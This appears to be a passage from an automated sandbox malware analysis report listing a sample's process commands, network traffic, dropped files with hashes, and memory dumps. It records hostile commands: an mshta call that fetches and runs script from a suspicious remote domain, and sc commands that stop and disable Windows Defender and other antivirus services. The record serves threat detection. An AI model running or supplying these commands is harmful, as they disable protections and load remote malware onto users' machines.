"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\56M04A~1.EXE" >> NUL
C:\Windows\SysWOW64\mshta.exe
mshta.exe "http://galaint.onlinesecstats.info/?0=155&1=1&2=1&3=54&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=tmikvgppmh&14=1"
C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
C:\Windows\SysWOW64\sc.exe
sc config WinDefend start= disabled
C:\Windows\SysWOW64\sc.exe
sc stop msmpsvc
C:\Windows\SysWOW64\sc.exe
sc config msmpsvc start= disabled
C:\Windows\SysWOW64\sc.exe
sc config ekrn start= disabled
C:\Windows\SysWOW64\sc.exe
sc stop AntiVirService
C:\Windows\SysWOW64\sc.exe
sc config AntiVirService start= disabled
C:\Windows\SysWOW64\sc.exe
sc config AntiVirSchedulerService start= disabled
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" res://ieframe.dll/dnserrordiagoff.htm#http://www.cmyip.com/
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4884 CREDAT:17410 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dl.dropbox.com | udp |
| NL | 162.125.65.15:80 | dl.dropbox.com | tcp |
| NL | 162.125.65.15:443 | dl.dropbox.com | tcp |
| US | 8.8.8.8:53 | galaint.onlinesecstats.info | udp |
| US | 8.8.8.8:53 | 15.65.125.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | realipshow.info | udp |
| US | 8.8.8.8:53 | www.cmyip.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.19.199.152.in-addr.arpa | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe
| MD5 | cb29fc6c4d1be6464d118d58750c7286 |
| SHA1 | d942e69817be663057275b373b308f6f4a5bdea4 |
| SHA256 | a0ce0051ee944ea54a214588d183deb2b7e72d6aa9d9180fcd16888cf232bef9 |
| SHA512 | bd1891c0f015ec27c3a5f99c9b89f7f6cd87b9edd2d4e59a79ebfcb1fb35d836b597fec509ca7694ef608e2dd86e0d8d68617587fe649df8fe66db6bd6f492a7 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe
| MD5 | c0ecef6a5e45a04e9b341ef74a4dd08f |
| SHA1 | f1d33665ab2ae2c658bbe6f64dee0986c3ba3d5a |
| SHA256 | 7f7b866445fd82fb423144bc7403af987a0ae4c1e27d38387a7ba84708856f5d |
| SHA512 | fdb0907b853db79d32ca8a0b23fed2c31e2886d247a7d09dc6154b42af734c8ee8da08c9bc7078e9dbc53b15a24d7a85bfabaa0ccd281f314a993a23c15157ac |
memory/3764-21-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-26-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/3764-27-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-35-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-36-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-48-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-49-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-50-0x0000000000400000-0x00000000007D9000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
| MD5 | 36c1eda34c01e5ce21e7bba810202b7a |
| SHA1 | 12a0a24749dae9e0688c402237f071df006beeb7 |
| SHA256 | 65c8cd605767e6e40458e14088393d6d8f389a12d83add67698c613df5498a44 |
| SHA512 | 5a615fba0a3b863d67bacf4df3d161a64dde2e0a62f994201b124973f27aa21999fc3be603b7a3f2d0c6cf04578501d1f4f617d03eed5897ecd1867599c36064 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
| MD5 | ee4ada789158c1e5a14d597cf1d5edd0 |
| SHA1 | 9593aee78d30d51ab93d6a29dc4dc873e0d466b6 |
| SHA256 | 903a6d82bf2fe8951104cf90d9f64aab0fbded30a2246e678a80d07868569b4f |
| SHA512 | a6214f62e5089512aeaabab7c4bb38e8663fb55d5f4129c57e726723dad10802ec40c3dc836087713b77c1874c12f177bf2b2998fd3e52f4210c1c5307885c16 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver7FBA.tmp
| MD5 | 1a545d0052b581fbb2ab4c52133846bc |
| SHA1 | 62f3266a9b9925cd6d98658b92adec673cbe3dd3 |
| SHA256 | 557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1 |
| SHA512 | bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d |
memory/2776-69-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-70-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-71-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-72-0x0000000000400000-0x00000000007D9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\H4VCA4X1\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
memory/2776-83-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-85-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-86-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-87-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-88-0x0000000000400000-0x00000000007D9000-memory.dmp
memory/2776-89-0x0000000000400000-0x00000000007D9000-memory.dmp